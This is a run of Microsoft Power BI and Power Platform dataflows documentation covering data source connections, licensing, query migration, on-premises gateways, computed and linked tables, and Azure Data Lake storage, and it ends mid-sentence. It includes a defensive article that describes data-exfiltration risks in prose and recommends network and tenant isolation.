Connect to a data source


To connect to a data source, select the data source. This section uses one example to
show how the process works, but each data connection for dataflows is similar in
process. Different connectors might require specific credentials or other information, but
the flow is similar. In this example, SQL Server database is selected from the Database
data connection category.
A connection window for the selected data connection is displayed. If credentials are
required, you're prompted to provide them. The following image shows a server and
database being entered to connect to a SQL Server database.

After the server URL or resource connection information is provided, enter the
credentials to use for access to the data. You may also need to enter the name of an on-
premises data gateway. Then select Next.

Power Query Online initiates and establishes the connection to the data source. It then
presents the available tables from that data source in the Navigator window.
You can select tables and data to load by selecting the check box next to each in the left
pane. To transform the data you've chosen, select Transform data from the bottom of
the Navigator window. A Power Query Online dialog box appears, where you can edit
queries and perform any other transformations you want to the selected data.

Connecting to additional data sources


There are additional data connectors that aren't shown in the Power BI dataflows user
interface, but are supported with a few additional steps.
You can take the following steps to create a connection to a connector that isn't
displayed in the user interface:

1. Open Power BI Desktop, and then select Get data.

2. Open Power Query Editor in Power BI Desktop, right-click the relevant query, and
then select Advanced Editor, as shown in the following image. From there, you can
copy the M script that appears in the Advanced Editor window.

3. Open the Power BI dataflow, and then select Get data for a blank query.

4. Paste the copied query into the blank query for the dataflow.
Your script then connects to the data source you specified.

The following list shows which connectors you can currently use by copying and pasting
the M query into a blank query:

SAP Business Warehouse


Azure Analysis Services
Adobe Analytics
ODBC
OLE DB
Folder
SharePoint Online folder
SharePoint folder
Hadoop HDFS
Azure HDInsight (HDFS)
Hadoop file HDFS
Informix (beta)

Next steps
This article showed which data sources you can connect to for dataflows. The following
articles go into more detail about common usage scenarios for dataflows:

Self-service data prep in Power BI


Using incremental refresh with dataflows
Creating computed entities in dataflows
Link entities between dataflows

For information about individual Power Query connectors, go to the connector reference
list of Power Query connectors, and select the connector you want to learn more about.
Additional information about dataflows and related information can be found in the
following articles:

Create and use dataflows in Power BI


Using dataflows with on-premises data sources
Developer resources for Power BI dataflows
Dataflows and Azure Data Lake integration (Preview)

For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model - overview


What licenses do you need to use
dataflows?
Article • 08/04/2023

Dataflows can be created in different portals, such as Power BI and the Power Apps, and
can be of either analytical or standard type. In addition, some dataflow features are only
available as Premium features. Considering the wide range of products that can use
dataflows, and feature availability in each product or dataflow type, it's important to
know what licensing options you need to use dataflows.

Creating dataflows in Power BI workspaces


If you want to create dataflows in Power BI workspaces, you need to have a paid Power
BI Pro license. A Power BI free license doesn't give you the ability to create dataflows.
Depending on the features you use, Power BI Premium (per user) or embedded capacity
is required.

A Power BI Pro account is available on a user-monthly basis. Multiple options are


available for premium or embedded capacities.

Creating dataflows in Microsoft Power Platform


environments
If you want to create dataflows in the Microsoft Power Platform environment, a Power
Apps (per-user or per-app) license is required.

If you want to create analytical dataflows that store data in your organization's Azure
Data Lake Storage Gen2 account, you or your administrator need access to an Azure
subscription and an Azure Data Lake Storage Gen2 account.

Premium features
Some of the dataflow features are limited to premium licenses. If you want to use the
enhanced compute engine to speed up your dataflow queries' performance over
computed tables, or have the DirectQuery connection option to the dataflow, you need
to have Power BI P1 or A3 or higher capacities.
AI capabilities in Power BI, linked table, and computed table are all premium functions
that aren't available with a Power BI Pro account.

List of features
The following table contains a list of features and the license needed for them to be
available.

Feature Power BI Power Apps

Store data in Dataverse tables (standard dataflow) N/A Per app plan
Per user plan

Store data in Azure Data Lake Storage (analytical Yes Yes, using analytical
dataflow) dataflows

Store data in customer provided Azure Data Lake Yes Per app plan
Storage (analytical dataflow; bring your own Azure Per user plan
Data Lake Storage)

The enhanced compute engine (running on Power BI Power BI N/A


Premium capacity / parallel execution of transforms) Premium only

DirectQuery connection to dataflow Power BI N/A


Premium only

AI capabilities in Power BI Power BI N/A


Premium only

Linked tables Power BI Yes, using analytical


Premium only dataflows

Computed tables (in-storage transformations using M) Power BI Yes, using analytical


Premium only dataflows

Schedule refresh Yes Yes

Dataflow authoring with Power Query Online Yes Yes

Dataflow management Yes Yes

New connectors Yes Yes

Standardized schema, built-in support for Common Yes Yes


Data Model

Dataflows data connector in Power BI Desktop Yes Yes, using analytical


dataflows
Feature Power BI Power Apps

Dataflow incremental refresh Power BI Yes, using analytical


Premium only dataflows with Per user
Plan

Limitations on each license


The preceding table shows what features each license gives you. The following sections
provide details about some of the limitations of each license.

Power Apps licenses


If you use a Power Apps license to create dataflows, there's no limitation on the number
of dataflows and tables you can create. However, there's a limitation on the size of
Dataverse service you can use and refresh performance.

The Power Apps per-app plan covers up to a 50-MB database capacity. The Power Apps
per-user plan allows you to have a database of 250-MB capacity.

The following limitations are in place in Power Apps:

A dataflow refresh can run for a maximum of 24 hours.


Each query/partition has a maximum run duration of four hours.
For each refresh, there's a concurrency limit of four queries/partitions that can
refresh simultaneously.
Power Query Online refresh limits apply for each user. More information: Refresh
limits

Power BI Pro
Power BI Pro gives you the ability to create analytical dataflows, but not use any of the
premium features. With a Power BI Pro account, you can't use linked or computed
tables, you can't use AI capabilities in Power BI, and you can't use DirectQuery to
connect to the dataflow. The storage for your dataflows is limited to the space left under
your Power BI Pro account, which is a subset of 10-GB storage for all Power BI content.
Currently, we don't report the current storage usage of dataflows in the Power BI portal.
You'll be notified if you've almost reached the limit of the left over capacity.

Power BI Premium
If you use Power BI Premium (capacity-based licensing), you can use all the AI
capabilities in Power BI, computed tables and linked tables, with the ability to have a
DirectQuery connection to the dataflow. You can also use the enhanced compute
engine. However, the dataflow created under a premium capacity license uses only the
internal Azure Data Lake Storage, and isn't accessible by other platforms except Power
BI itself. You can't create external dataflows just by having a Power BI Premium license;
you need to have an Azure subscription for Azure Data Lake Storage as well.

Limitations per premium capacity

Dataflows that are using a premium capacity to refresh the data are limited to the
maximum number of parallel tasks they can perform at a given time. The maximum
number of parallel tasks depends on the type of premium capacity you're using. This
table represents the maximum number of parallel tasks that can be run at a given time
by all dataflows in a workspace mapped to the capacity.

Parallel tasks
A premium capacity can run multiple evaluations in parallel. For example, you have a P4
capacity and a dataflow that consists of 84 tasks. You refresh your dataflow and the first
64 tasks are allocated for the refresh. The 20 left over evaluations for this dataflow are
parked in a queue. Once one of the evaluations is finished, it starts with the next
evaluation from the queue. If you start another dataflow in your workspace on the same
premium capacity while the other is still running, it gets parked in the same queue of
the premium capacity and needs to wait on the other dataflows in the workspace to
start the refresh of your data.

You can use the following pointers to estimate the number of tasks of your dataflow
refresh:

The number of queries executed in the refresh (don't forget the upstream linked
tables).
The number of partitions in an incremental refresh query are considered as extra
tasks.

Strategy to lower the number of tasks during refresh

To lower the number of tasks or improve the efficiency of your tasks, you can use the
following strategies:
Lower the number of queries in your dataflow by combining queries where
possible and only "enable load" for queries that are used downstream.
Evaluate if you really need the upstream linked tables to refresh automatically.
Strategically schedule your dataflow refreshes based on the number of tasks.
Make sure your query returns the minimum set of columns and rows to satisfy
your data need. The faster and more efficiently the task executes, the sooner the
next task can start.

Using your organization's Azure Data Lake Storage


account for dataflow storage
To create dataflows that store data in your organization's Azure Data Lake Storage
account, in addition to the product licenses above, you must have an Azure subscription.
The amount of storage that can be used isn't limited by the dataflow or the product it
was created in.

Next step
If you want to read more details about the concepts discussed in this article, go to any
of the following links.

Pricing
Power BI pricing
Power Apps pricing
Azure Data Lake Storage Gen 2 pricing

Features
Computed tables
Linked tables
AI capabilities in Power BI dataflows
Standard vs. analytical dataflows
The enhanced compute engine
How to migrate queries from Power
Query in the desktop (Power BI and
Excel) to dataflows
Article • 02/17/2023

If you already have queries in Power Query, either in Power BI Desktop or in Excel, you
might want to migrate the queries into dataflows. The migration process is simple and
straightforward. In this article, you'll learn the steps to do so.

To learn how to create a dataflow in Microsoft Power Platform, go to Create and use
dataflows in Power Platform. To learn how to create a dataflow in Power BI, go to
Creating and using dataflows in Power BI.

Migrating the queries from the desktop


To migrate queries from Power Query in the desktop tools:

1. Open Power Query Editor:

In Power BI Desktop on the Home tab, select Transform data.

In Excel on the Data tab, select Get Data> Launch Power Query Editor.
2. Copy the queries:

If you've organized your queries into folders (called groups in Power Query):

a. In the Queries pane, select Ctrl as you select the folders you want to migrate to
the dataflow.

b. Select Ctrl+C.
If you don't have folders:

a. In the Queries pane, select Ctrl as you select the queries you want to migrate.

b. Select Ctrl+C.
3. Paste the copied queries into a dataflow:

a. Create a dataflow, if you don't have one already.

b. Open the dataflow in Power Query Editor, and in the Queries pane, select
Ctrl+V to paste the copied folders or queries.
The image below shows an example of successfully copied folders.

4. Connect the on-premises data gateway.

If your data source is an on-premises source, you need to perform an extra step.
Examples of on-premises sources can be Excel files in a shared folder in a local
domain, or a SQL Server database hosted in an on-premises server.

A dataflow, as a cloud-based service, requires the on-premises data gateway to


connect to the on-premises data source. You need to install and configure the
gateway for that source system, and then add the data source for it. After you've
completed these steps, you can select the on-premises data gateway when you
create the entity in the dataflow.

The gateway isn't needed for data sources residing in the cloud, such as an Azure
SQL database.

5. Configure the connection to the data source by selecting Configure connection


and entering credentials or anything else you need to connect to the data source
at this stage.

6. Verify the connection:

If you've done all the steps successfully, you'll see a preview of the data in the
Power Query Editor.

Some Power Query Desktop functions require a


gateway in Power Query Online
Some of the functions might require a gateway, even if their source is not located on-
premises. Among these are functions such as Web.BrowserContents and Web.Page. If
this happens, you might get an error message indicating which specific function isn't
supported. The figure below shows an example of one of these scenarios.
If a scenario like this happens, you have two options. You can set up the gateway for
that data source, or you can update the query in the Power Query Editor for the
dataflow by using a set of steps that are supported without the need for the gateway.

Refresh the dataflow entities


After migrating your queries to the dataflow, you must refresh the dataflow to get data
loaded into these entities. You can refresh a dataflow manually or configure an
automatic refresh based on the schedule of your choice.

Get data from Power Query Desktop


You can now get data from dataflow entities in Power BI Desktop by using the Power
Platform dataflow or Dataverse connectors (depending on what type of dataflow you're
using, analytical or standard). More information: Connect to data created by Power
Platform dataflows in Power BI Desktop
Using an on-premises data gateway in
Power Platform dataflows
Article • 02/17/2023

Install an on-premises data gateway to transfer data quickly and securely between a
Power Platform dataflow and a data source that isn't in the cloud, such as an on-
premises SQL Server database or an on-premises SharePoint site. You can view all
gateways for which you have administrative permissions and manage permissions and
connections for those gateways.

Prerequisites

Power BI service
A Power BI service account. Don't have one? Sign up for 60 days free.

Administrative permissions on a gateway. These permissions are provided by


default for gateways you install. Administrators can grant other people permissions
for gateways.

Power Apps
A Power Apps account. Don't have one? Sign up for 30 days free.

Administrative permissions on a gateway. These permissions are provided by


default for gateways you install. Administrators can grant other people permissions
for gateways.

A license that supports accessing on-premises data using an on-premises gateway.


More information: "Connect to your data" row of the "Explore Power Apps plans"
table in the Power Apps pricing page.

Install a gateway
You can install an on-premises data gateway directly from the online service.

7 Note
It's a good general practice to make sure you're using a supported version of
the on-premises data gateway. We release a new update of the on-premises
data gateway every month. Currently, Microsoft actively supports only the last
six releases of the on-premises data gateway.
Starting April 2022, the minimum required gateway version will be Feburary
2021. Dataflows that refresh using an earlier version of the gateway might
stop refreshing.

Install a gateway from Power BI service


To install a gateway from Power BI service:

1. Select the downloads button in the upper right corner of Power BI service, and
choose Data Gateway.

2. Install the gateway using the instructions provided in Install an on-premises data
gateway.

Install a gateway from Power Apps


To install a gateway from Power Apps:

1. In the left navigation pane of powerapps.com , select Data > Gateways.


2. Select New gateway .
3. In the On-Premises Data Gateway section, select Download.

4. Install the gateway using the instructions provided in Install an on-premises data
gateway.

Use an on-premises data source in a dataflow


1. For instructions on how to create a new dataflow, go to Create a dataflow from a
data source.

2. Select an on-premises data source from the data sources list.

3. Provide the connection details for the enterprise gateway that will be used to
access the on-premises data. You must select the gateway itself, and provide
credentials for the selected gateway. Only gateways for which you're an
administrator appear in the list.

You can change the enterprise gateway used for a given dataflow and change the
gateway assigned to all of your queries using the dataflow authoring tool.

7 Note

The dataflow will try to find or create the required data sources using the new
gateway. If it can't do so, you won't be able to change the gateway until all needed
dataflows are available from the selected gateway.

View and manage gateway permissions

Power BI service gateway permissions


1. Select the setup button in the upper right corner of Power BI service, choose
Manage gateways, and then select the gateway you want.
2. To add a user to the gateway, select the Administrators table and enter the email
address of the user you would like to add as an administrator. Creating or
modifying data sources in dataflows requires Admin permissions to the gateway.
Admins have full control of the gateway, including adding users, setting
permissions, creating connections to all available data sources, and deleting the
gateway.

The following conditions apply when adding a user to the gateway:

1. If we detect that an existing data source is available for the selected gateway, the
Username and Password fields will be pre-populated.

a. If you select Next at this point, you're considered to be using that existing data
source, and so you only need to have permissions to that data source.

b. If you edit any of the credential fields and select Next, then you're considered to
be editing that existing data source, at which point you need to be an admin of
the gateway.

2. If we don't detect that an existing data source is available for the selected gateway,
the Username and Password fields will be blank, and if you edit the credential
fields and select Next, then you're considered to be creating a new data source on
the gateway, at which point you need to be an admin of the gateway.
If you only have data source user permission on the gateway, then 1.b and 2 can't be
achieved and the dataflow can't be created.

Power Apps gateway permissions


1. In the left navigation pane of powerapps.com , select Gateways and then select
the gateway you want.

2. To add a user to a gateway, select Users, specify a user or group, and then specify
a permission level. Creating new data sources with a gateway in dataflows requires
Admin permission on the gateway. Admins have full control of the gateway,
including adding users, setting permissions, creating connections to all available
data sources, and deleting the gateway.

View and manage gateway connections

Power BI service gateway connections


1. Select the setup button in the upper right corner of Power BI service, choose
Manage gateways, and then select the gateway you want.

2. Perform the action that you want:

To view details and edit the settings, select Gateway Cluster Settings.
To add users as administrators of the gateway, select Administrators.
To add a data source to the gateway, select Add Data Source, enter a data
source name and choose the data source type under Data Source Settings,
and then enter the email address of the person who will use the data source.
To delete a gateway, select the ellipsis to the right of the gateway name and
then select Remove.

Power Apps gateway connections


1. In the left navigation bar of powerapps.com, select Gateways, and then choose the
gateway you want.

2. Perform the action that you want:

To view details, edit the settings, or delete a gateway, select Connections, and
then select a connection.

To share a connection, select Share and then add or remove users.


7 Note

You can only share some types of connections, such as a SQL Server
connection. For more information, see Share canvas-app resources in
Power Apps.

For more information about how to manage a connection, see Manage


canvas-app connections in Power Apps.

Limitations
There are a few known limitations when using enterprise gateways and dataflows.

Dataflow refresh might fail if an out-of-date data gateway is used. Starting April
2022, the minimum required data gateway version is February 2021.

Each dataflow can use only one gateway. As such, all queries should be configured
using the same gateway.

Changing the gateway impacts the entire dataflow.

If several gateways are needed, the best practice is to build several dataflows (one
for each gateway). Then use the compute or table reference capabilities to unify
the data.

Dataflows are only supported using enterprise gateways. Personal gateways won't
be available for selection in the drop-down lists and settings screens.

Creating new data sources with a gateway in dataflows is only supported for
people with Admins permissions.

Users with Can Use or Can Use + Share permissions can use existing connections
when creating dataflows.

The following connectors are supported:


DB2
File System
Apache Impala
Informix
MySQL
Oracle Database
PostgreSQL
SAP ERP
SharePoint
SQL Server
Teradata
Desktop flows
HTTP with Azure AD

Troubleshooting
When you attempt to use an on-premises data source to publish a dataflow, you might
come across the following MashupException error:

AzureDataLakeStorage failed to get the response:


'The underlying connection was closed: An unexpected error occurred on a
send.'

This error usually occurs because you're attempting to connect to an Azure Data Lake
Storage endpoint through a proxy, but you haven't properly configured the proxy
settings for the on-premises data gateway. To learn more about how to configure these
proxy settings, go to Configure proxy settings for the on-premises data gateway.

For more information about troubleshooting issues with gateways, or configuring the
gateway service for your network, go to the On-premises data gateway documentation.

If you're experiencing issues with the gateway version you're using, try updating to the
latest version as your issue might have been resolved in the latest version. For more
information about updating your gateway, go to Update an on-premises data gateway.

Next steps
Create and use dataflows in Power Apps

Add data to a table in Microsoft Dataverse by using Power Query

Connect Azure Data Lake Storage Gen2 for dataflow storage


Data exfiltration considerations and
best practices for dataflows
Article • 08/07/2023

Fabric dataflows and Power Platform dataflows are Microsoft 365 services that enable
users to easily connect to, extract, move, and transform data across hundreds of
supported data sources. Dataflows build upon an underlying service called Power Query
Online, which hosts the data movement engine (Mashup Engine) as a cloud service. By
default, connectivity originates from this cloud location and has unrestricted access to
the internet. Therefore, when using dataflows to access and move sensitive data,
organizations should consider strategies to deter insiders from accidental or malicious
data exfiltration. This article outlines known risk factors and best practices for
safeguards.

Considerations

Arbitrary code execution


Dataflow ETL jobs are defined through programs written in a language called Power
Query M. In its default configuration, the Mashup Engine executes these programs in
the cloud, outside the tenant's network boundary, and with unrestricted internet access.
Users can author programs that connect to multiple data sources, and upon consent,
allow data to flow between these sources.

A trusted user who has access to sensitive data can author a program to push the data
to an untrusted data store. Since the Mashup Engine runs entirely in the cloud, it doesn't
go through corporate firewalls and proxy servers. So, it isn't subject to any data loss
prevention (DLP) policies that might be enforced by these networks. Since the point of
access is on the public internet, data can travel to any destination that the user has
access to—either through authentication or anonymous access. Here are some
examples of ways in which these programs can exfiltrate sensitive data:

Anonymous web requests: By using Web.Contents, users can make web requests
with sensitive data in the body of the request.
Cross data source filtering and joins: Sensitive data can be used as filtering or join
conditions against another untrusted data source. Specifically, data can travel to
the untrusted data source in the form of query strings or parameters.
Output destinations: By using Fabric dataflows, users can specify output
destinations for their queries, thereby transferring data to a list of supported data
sinks, which includes Azure SQL databases and data warehouses, Fabric
Lakehouses, Warehouses, and KQL databases.

Cross-tenant data movement


The Mashup Engine requires data sources to be explicitly defined before making
connections. The data sources are bound to programs with a kind and path key (for
example, SQL;contoso.database.windows.net ). This binding provides an opportunity for
organizations to govern which data sources are permitted, by filtering based on the data
source paths. However, there are some data sources where the path is common across
all connections and data is segmented only by the tenant of the signed in user's OAuth
credentials. This scenario creates a risk factor for data exfiltration, where a user signs
into a higher security tenant and a lower security tenant and moves data between them.
Typically, this exfiltration can be done in two ways:

Outbound: A trusted user in a higher security tenant defines a dataflow in that


environment and creates an output destination to a permitted data sink, but
authenticates with the data sink using an account from a lower security tenant.
Inbound: A user in a lower security tenant defines a dataflow that reads data from
a sensitive data source in the higher security tenant. This definition can be
achieved by authenticating against the sensitive data source using a trusted
account in the higher security tenant.

Recommended best practices


DLP policies can operate at various OSI layers. In general, the more sensitive the data,
the lower the layer where the policies must be applied. Lower layer protocols are
typically more expensive to implement, harder to scale, and more difficult to operate.
For example, organizations with lower governance requirements might only need to
apply application layer policies. However, some organizations and entities processing
highly sensitive data might require extreme measures such as physical isolation. We
recommend that organizations handling sensitive data employ a combination of
application and network-level policies to protect against insider threats.

Network isolation
We recommend that all data stores containing sensitive data be network isolated to
permit access only from selected networks. This isolation restriction must be defined
and operated at the network layer or lower. For example, layer 3 firewalls, Network
Security Groups (NSGs), and Azure Private Links are good examples of mechanisms that
can be used. However, location-based conditional access policies in Azure Active
Directory (Azure AD) operate at the application layer and are considered insufficient for
this purpose.

These network isolation policies must obstruct line of sight from dataflows' cloud
execution engine to sensitive data stores (since the cloud engine runs on the public
internet). Dataflows' connectivity to these data stores is then forced to originate from
within one of the permitted networks by binding connections to an on-premises data
gateway or VNet data gateway. An important execution characteristic of dataflows is
that cloud-based evaluation and gateway-based evaluation are never blended. If a
dataflow needs to access a network isolated data store (and is therefore bound to a
gateway), all data access is then required to flow through the gateway. Additionally,
since gateways physically reside in networks controlled by the user tenant, they comply
with network level restrictions such as firewalls and DLP protection solutions. These
restrictions make gateway environments as secure and safe as any corporate managed
devices and mitigate risks associated with arbitrary code execution in a cloud
environment.

It's worth noting that network isolation must be applied to all data stores that might
contain sensitive data. Consider an example where a user creates a dataflow to read
data from OneDrive for Business into Power BI. Then the user later creates a linked
dataflow to transform the data in Power BI into downstream entities. In this scenario, it's
not sufficient to just isolate OneDrive for Business to trusted networks. Since sensitive
data might also reside within Power BI, it's important to isolate such data by enabling
private links and disabling public Internet access for Power BI. Learn more about secure
access to Power BI using private endpoints.
Force gateway execution
The goal for isolating sensitive data store to selected networks is to force the origin of
access back to trusted networks, so that existing policies governing managed devices
can be used to govern data movement from dataflows. In certain cases, a full network
isolation solution might take time to develop, test, and deploy. As an alternative, you
can file a dataflows support ticket to apply a tenant-wide policy that turns off the
Mashup Engine. This policy affects all query evaluations that use the Power Query
Online Mashup Engine. Impacted capabilities include:

Fabric dataflows
Power Platform dataflows
Azure Data Factory wrangling dataflows
Dataflows in Dynamics 365 (Customer Insights, Intelligent Order Management, and
so on)
Power BI Datamart
Power BI Quick Import from SharePoint

After application of the policy, all cloud-based execution fails with the following error:
Cloud evaluation request denied based on tenant policies. Please use a data gateway

and try again. This error effectively forces all query evaluations in the tenant to occur

on gateways, without first rolling out a full network isolation solution. Note that the
policy is applied to the entire tenant and not a subset of workloads. This policy means
existing workloads fail immediately and require manual intervention to convert to run
on gateways. Organizations applying this policy should also ensure that they have
enough capacity in their gateway clusters to accommodate all their workloads.

Tenant isolation
For most software-as-a-service (SaaS) layer data stores, such as Fabric Lakehouse and
Power Platform Dataverse, there's usually a multi-tenant endpoint that one
communicates with to gain access to the data. These endpoints are common across all
users of the service, so they can be difficult to isolate and protect solely using network
(Layer 3) isolation techniques. The recommended approach for this kind of data store is
to use Layer 7 policies, typically provided by Azure Active Directory:

Allow only Azure AD authentication. Remove anonymous and username/password


authentication schemes from the data store.
Use location policies to allow sign-in to the secured tenant only from managed
devices. Learn more.
Disallow unknown tenant sign-ins from managed devices by using Azure AD
tenant restrictions. Use tenant restrictions to manage access to SaaS apps. Learn
more.

This approach restricts access to the tenant’s sensitive data stores to a set of managed
devices where signing into another tenant isn't permitted, effectively isolating data
movement across the tenant.

Roadmap
The following list contains some of the features that are currently planned to help
organizations better manage data exfiltration risks in Fabric:

Data source connection allowlisting: Allows Fabric tenant admins to control the
kinds of connectors that can be used within the tenant, and the endpoints the
connectors can connect to.
Connection usage auditing: Support for auditing logs that track connection
creation, updating, deletion, and usage.
Creating computed tables in dataflows
Article • 08/04/2023

You can perform in-storage computations when using dataflows with a Power BI
Premium subscription. This lets you do calculations on your existing dataflows, and
return results that enable you to focus on report creation and analytics.

To perform in-storage computations, you first must create the dataflow and bring data
into that Power BI dataflow storage. After you have a dataflow that contains data, you
can create computed tables, which are tables that do in-storage computations.

There are two ways you can connect dataflow data to Power BI:

Using self-service authoring of a dataflow


Using an external dataflow

The following sections describe how to create computed tables on your dataflow data.

How to create computed tables


After you have a dataflow with a list of tables, you can perform calculations on those
tables.

In the dataflow authoring tool in the Power BI service, select Edit tables. Then right-click
the table you want to use as the basis for your computed table and on which you want
to perform calculations. On the shortcut menu, select Reference.
For the table to be eligible as a computed table, Enable load must be selected, as shown
in the following image. Right-click the table to display this shortcut menu.

By selecting Enable load, you create a new table whose source is the referenced table.
The icon changes to the computed icon, as shown in the following image.
Any transformation you do on this newly created table will be run on the data that
already resides in Power BI dataflow storage. That means that the query won't run
against the external data source from which the data was imported (for example, the
SQL database from which the data was pulled).

Example use cases


What kind of transformations can be done with computed tables? Any transformation
that you usually specify by using the transformation user interface in Power BI, or the M
editor, are all supported when performing in-storage computation.

Consider the following example. You have an Account table that contains the raw data
for all the customers from your Dynamics 365 subscription. You also have ServiceCalls
raw data from the service center, with data from the support calls that were performed
from the different accounts on each day of the year.

Imagine you want to enrich the Account table with data from ServiceCalls.

First you would need to aggregate the data from the ServiceCalls to calculate the
number of support calls that were done for each account in the last year.

Next, you merge the Account table with the ServiceCallsAggregated table to calculate
the enriched Account table.

Then you can see the results, shown as EnrichedAccount in the following image.

And that's it—the transformation is done on the data in the dataflow that resides in your
Power BI Premium subscription, not on the source data.

Considerations and limitations


It's important to note that if you remove the workspace from Power BI Premium
capacity, the associated dataflow will no longer be refreshed.

When working with dataflows specifically created in an organization's Azure Data Lake
Storage account, linked tables and computed tables only work properly when the tables
reside in the same storage account. More information: Connect Azure Data Lake Storage
Gen2 for dataflow storage

Linked tables are only available for dataflows created in Power BI and Power Apps. As a
best practice, when doing computations on data joined by on-premises and cloud data,
create a new table to perform such computations. This provides a better experience
than using an existing table for computations, such as an table that is also querying data
from both sources and doing in-storage transformations.

See also
Computed table scenarios and use cases

This article described computed tables and dataflows. Here are some more articles that
might be useful:

Self-service data prep in Power BI


Using incremental refresh with dataflows
Connect to data sources for dataflows
Link tables between dataflows

The following links provide additional information about dataflows in Power BI and
other resources:

Create and use dataflows in Power BI


Using dataflows with on-premises data sources
Developer resources for Power BI dataflows
Configure workspace dataflow settings (Preview)
Add a CDM folder to Power BI as a dataflow (Preview)
Connect Azure Data Lake Storage Gen2 for dataflow storage (Preview)

For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model


Link tables between dataflows
Article • 08/04/2023

With dataflows in Microsoft Power Platform, you can have a single organizational data
storage source where business analysts can prep and manage their data once, and then
reuse it between different analytics apps in the organization.

When you link tables between dataflows, you can reuse tables that have already been
ingested, cleansed, and transformed by dataflows that are owned by others, without the
need to maintain that data. The linked tables simply point to the tables in other
dataflows, and don't copy or duplicate the data.

Linked tables are read-only, so if you want to create transformations for a linked table,
you must create a new computed table with a reference to the linked table.

Linked table availability


Linked table availability depends on whether you're using dataflows in Power BI or
Power Apps. The following sections describe the details for each.

Linked tables in Power BI


To be refreshed, linked tables require a Power BI Premium subscription. Linked tables are
available in any dataflow on a workspace that's hosted on Power BI Premium capacity.
There are no limitations on the source dataflow.

Linked tables only work properly in new Power BI workspaces, and, likewise, all linked
dataflows must be located in new workspaces. More information: Create the new
workspaces in Power BI

7 Note

Tables differ based on whether they're standard tables or computed tables.


Standard tables (often simply referred to as tables) query an external data source,
such as a SQL database. Computed tables require Premium capacity on Power BI
and run their transformations on data that's already in Power BI storage.

If your dataflow isn't located in a Premium capacity workspace, you can still
reference a single query—or combine two or more queries—as long as the
transformations aren't defined as in-storage transformations. Such references are
considered standard tables. To do this, turn off the Enable load option for the
referenced queries to prevent the data from being materialized and ingested into
storage. From there, you can reference those Enable load = false queries, and set
Enable load to On only for the resulting queries that you want to materialize.

Linked tables in Power Apps


For more information about the availability of linked tables in Power Apps, go to What
licenses do you need to use dataflows.

How to link tables between dataflows


There are a few ways to link tables between dataflows. To link tables in Power BI, you
must sign in with your Power BI credentials.

You can select Get data from the dataflow authoring tool, which displays a dialog box
for selecting the categories and each data source. Then select the Power Platform
Dataflows connector.

A connection window for the selected data connection is displayed. If credentials are
required, you're prompted to provide them.

In Power BI, you can select Add linked tables from the dataflow authoring tool.

You can also select Add linked tables from the Add tables menu in the Power BI service.

A Navigator window opens, and you can choose a set of tables you can connect to. The
window displays tables for which you have permissions across all workspaces and
environments in your organization.

After you select your linked tables, they appear in the list of tables for your dataflow in
the authoring tool, with a special icon identifying them as linked tables.

You can also view the source dataflow from the dataflow settings of your linked table.

Refresh logic of linked tables


The refresh logic of linked tables differs slightly based on whether you're using Power BI
or Power Apps, as described in the following sections.

Refresh logic in Power BI


The default refresh logic of linked tables depends on whether the source dataflow is in
the same Power BI workspace as the destination dataflow. The following sections
describe the behavior of each.
Links between workspaces: Refresh for links from tables in different workspaces
behaves like a link to an external data source. When the dataflow is refreshed, it
takes the latest data for the table from the source dataflow. If the source dataflow
is refreshed, it doesn't automatically affect the data in the destination dataflow.

Links in the same workspace: When data refresh occurs for a source dataflow, that
event automatically triggers a refresh process for dependent tables in all
destination dataflows in the same workspace, including any calculated tables
based on them. All other tables in the destination dataflow are refreshed according
to the dataflow schedule. Tables that depend on more than one source refresh
their data whenever any of their sources are refreshed successfully.

7 Note

The entire refresh process is committed at once. Because of this, if the data
refresh for the destination dataflow fails, the data refresh for the source
dataflow fails as well.

Refresh logic in Power Apps


The refresh logic of linked tables in Power Apps behaves like an external data source.
When the dataflow is refreshed, it takes the latest data for the table from the source
dataflow. If the source dataflow is refreshed, it doesn't automatically affect the data in
the destination dataflow.

Permissions when viewing reports from


dataflows
When creating a Power BI report that includes data based on a dataflow, you can see
any linked tables only when you have access to the source dataflow.

Limitations and considerations


There are a few limitations to keep in mind when working with linked tables:

A table can be referenced by another dataflows. That reference table can also be
reference by other dataflows, and so on, up to five times.
Cyclical dependencies of linked tables aren't allowed.
The dataflow must be in a new Power BI workspace or a Power Apps environment.
A linked table can't be joined with a regular table that gets its data from an on-
premises data source.
When using M parameters to address linked tables, if the source dataflow is
refreshed, it doesn't automatically affect the data in the destination dataflow.
Attempting to connect two dataflow tables between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.

Next steps
The following articles might be useful as you create or work with dataflows:

Self-service data prep in Power BI


Using incremental refresh with dataflows
Creating computed tables in dataflows
Connect to data sources for dataflows

The following articles provide more information about dataflows and Power BI:

Create and use dataflows in Power BI


Using computed tables on Power BI Premium
Using dataflows with on-premises data sources
Developer resources for Power BI dataflows

For more information about Power Query and scheduled refresh, you can read these
articles:

Query overview in Power BI Desktop


Configuring scheduled refresh

For more information about Common Data Model, you can read its overview article:

Common Data Model - overview


Connect Azure Data Lake Storage Gen2
for dataflow storage
Article • 05/12/2023

You can configure dataflows to store their data in your organization's Azure Data Lake
Storage Gen2 account. This article describes the general steps necessary to do so, and
provides guidance and best practices along the way.

) Important

Dataflow with Analytical tables feature utilizes the Azure Synapse Link for Dataverse
service, which may offer varying levels of compliance, privacy, security, and data
location commitments. For more information about Azure Synapse Link for
Dataverse, go to What is Azure Synapse Link for Dataverse?.

There are some advantages to configuring dataflows to store their definitions and
datafiles in your data lake, such as:

Azure Data Lake Storage Gen2 provides an enormously scalable storage facility for
data.
Dataflow data and definition files can be leveraged by your IT department's
developers to leverage Azure data and artificial intelligence (AI) services as
demonstrated in the GitHub samples from Azure data services.
It enables developers in your organization to integrate dataflow data into internal
applications and line-of-business solutions, using developer resources for
dataflows and Azure.

Requirements
To use Azure Data Lake Storage Gen2 for dataflows, you need the following:

A Power Apps environment. Any Power Apps plan will allow you to create
dataflows with Azure Data Lake Storage Gen2 as a destination. You'll need to be
authorized in the environment as a maker.
An Azure subscription. You need an Azure subscription to use Azure Data Lake
Storage Gen2.
A resource group. Use a resource group you already have, or create a new one.
An Azure storage account. The storage account must have the Data Lake Storage
Gen2 feature enabled.
 Tip

If you don't have an Azure subscription, create a free trial account before you
